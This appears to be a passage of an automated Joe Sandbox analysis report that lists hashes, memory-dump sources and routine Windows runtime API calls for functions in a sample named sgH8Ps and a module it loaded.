                                                    • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                                    • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                    • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CommandLine$ByteCharErrorLastMultiWide
                                                    • String ID:
                                                    • API String ID: 3078728599-0
                                                    • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                    • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                                    • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                    • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                    • String ID:
                                                    • API String ID: 1850339568-0
                                                    • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                    • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                                    • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                    • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                    • Instruction ID: 6619d257d44266e13fb819b49d957750557f6ae76f6f0bb94f45c80f64578576
                                                    • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                    • Instruction Fuzzy Hash: 75112B3BF0DA9F81F7568994E43533812406F9BB70F140230E96F063EBCE2CA840C109
                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,00007FFDA55D766F,?,?,00000000,00007FFDA55D790A,?,?,?,?,?,00007FFDA55D7896), ref: 00007FFDA55D96A3
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFDA55D766F,?,?,00000000,00007FFDA55D790A,?,?,?,?,?,00007FFDA55D7896), ref: 00007FFDA55D96C2
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFDA55D766F,?,?,00000000,00007FFDA55D790A,?,?,?,?,?,00007FFDA55D7896), ref: 00007FFDA55D96EA
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFDA55D766F,?,?,00000000,00007FFDA55D790A,?,?,?,?,?,00007FFDA55D7896), ref: 00007FFDA55D96FB
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFDA55D766F,?,?,00000000,00007FFDA55D790A,?,?,?,?,?,00007FFDA55D7896), ref: 00007FFDA55D970C
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                    • Instruction ID: 0a88dea5139bd8747a847ab3af8f0223fc8544491036e73ef614548d3c8b71f9
                                                    • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                    • Instruction Fuzzy Hash: FC115E6BF0E28A85FA5AEF25557137961625F46FF0F544334D83D067C7FE2CA4418608
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                    • Instruction ID: a16a91b3949bfc418f4484dcf83f575ba63b20a2932241ab5982c23f43591cc5
                                                    • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                    • Instruction Fuzzy Hash: 2711D79BB0A28B85F96AEE21547137912524F46FB0E140634D83E097D3ED2CB4518A08
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3544855599-2084237596
                                                    • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                    • Instruction ID: f56cc64be419c5f6bf9cc577d2628cf76914609214f53f5274967107c79b6bfd
                                                    • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                    • Instruction Fuzzy Hash: AD91BF77B09789CAE752CF64E4903AD7BA0FB16B88F10412AEA4D07B56DF38D191CB04
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 2395640692-1018135373
                                                    • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                    • Instruction ID: 543df459e81ee9e02025d6760ad40fb2a42bed6758b7ba51cefff8e69516939e
                                                    • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                    • Instruction Fuzzy Hash: 2F51B03BB1A68ACAEB15CF15E464B387791EB41F88F128131DA4A4778ADF7CE841C704
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                    • Instruction ID: 899f712e1855a69f544eb14aeba4317f6d546397eb23c430ce65362ed1463b66
                                                    • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                    • Instruction Fuzzy Hash: 1D518F3BA092CACBEB65CF1194A43687790EB66F85F144136DA8E47B86CF3CE451C708
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3544855599-2084237596
                                                    • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                    • Instruction ID: 6e23d2491c4841db2ef1496b68de6208b9915dafb5dc6d4bb3821dfb8eb33236
                                                    • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                    • Instruction Fuzzy Hash: 34616D37A09BC9C2D662DF15E4503AAB7A0FB96B84F044225EB9D07B56CF7CD194CB04
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleLoadModuleProc
                                                    • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                    • API String ID: 3055805555-3733552308
                                                    • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                    • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                                    • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                    • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentSizeWorking
                                                    • String ID: Shrinking process size
                                                    • API String ID: 2122760700-652428428
                                                    • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                    • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                                    • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                    • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$Enter$Leave
                                                    • String ID:
                                                    • API String ID: 2801635615-0
                                                    • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                    • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                                    • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                    • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                    • String ID:
                                                    • API String ID: 2718003287-0
                                                    • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                    • Instruction ID: a71943fa3adb276ed681606c9d427581217ab47937f81055747349a9cd9d2d3b
                                                    • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                    • Instruction Fuzzy Hash: 76D1E237B0AA89C9E712CF66D4502EC37B1FB45B98B404236DE5D97B9ADE38D406C344
                                                    APIs
                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFDA55DED07), ref: 00007FFDA55DEE38
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFDA55DED07), ref: 00007FFDA55DEEC3
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: ConsoleErrorLastMode
                                                    • String ID:
                                                    • API String ID: 953036326-0
                                                    • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                    • Instruction ID: 1450eba16023f496b0eba7cfd13f8fbf0852a50426b5d01d16c94242dca4c396
                                                    • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                    • Instruction Fuzzy Hash: 2291B327B1A69AC5F752DF6694603BC7BA0EB06F88F144139DE0E57786DE38E441C708
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                                    • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                                    • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CriticalEventSection$EnterLeaveReset
                                                    • String ID:
                                                    • API String ID: 3553466030-0
                                                    • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                    • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                                    • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                    • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CriticalEventSection$EnterLeaveReset
                                                    • String ID:
                                                    • API String ID: 3553466030-0
                                                    • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                    • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                                    • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                    • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                    • String ID:
                                                    • API String ID: 2933794660-0
                                                    • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                    • Instruction ID: 3896224dc6128b276527377ebf3740dada760b6f53602b0bce9bbc52b9bb0cd2
                                                    • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                    • Instruction Fuzzy Hash: 13114F26B15B058AEB01CF60E8553B833A4F719B58F440D35EE1D467A9EF78E164C340
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CreateEvent$CriticalInitializeSection
                                                    • String ID:
                                                    • API String ID: 926662266-0
                                                    • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                    • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                                    • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                    • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: __except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 1467352782-3733052814
                                                    • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                    • Instruction ID: f2360160121cb5a1a767d68596db08afd136acb31848f97b0b863272da5de00b
                                                    • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                    • Instruction Fuzzy Hash: 8771B03B60A6C9CBD762DF25906077D7AA0EB16F85F048135DE8C07B9ACB2CD551C748
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CreateFrameInfo__except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 2558813199-1018135373
                                                    • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                    • Instruction ID: a71345d66c1b82a0c89ecf7ae7088b600bca1cae908f7bd84252af1b14614c95
                                                    • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
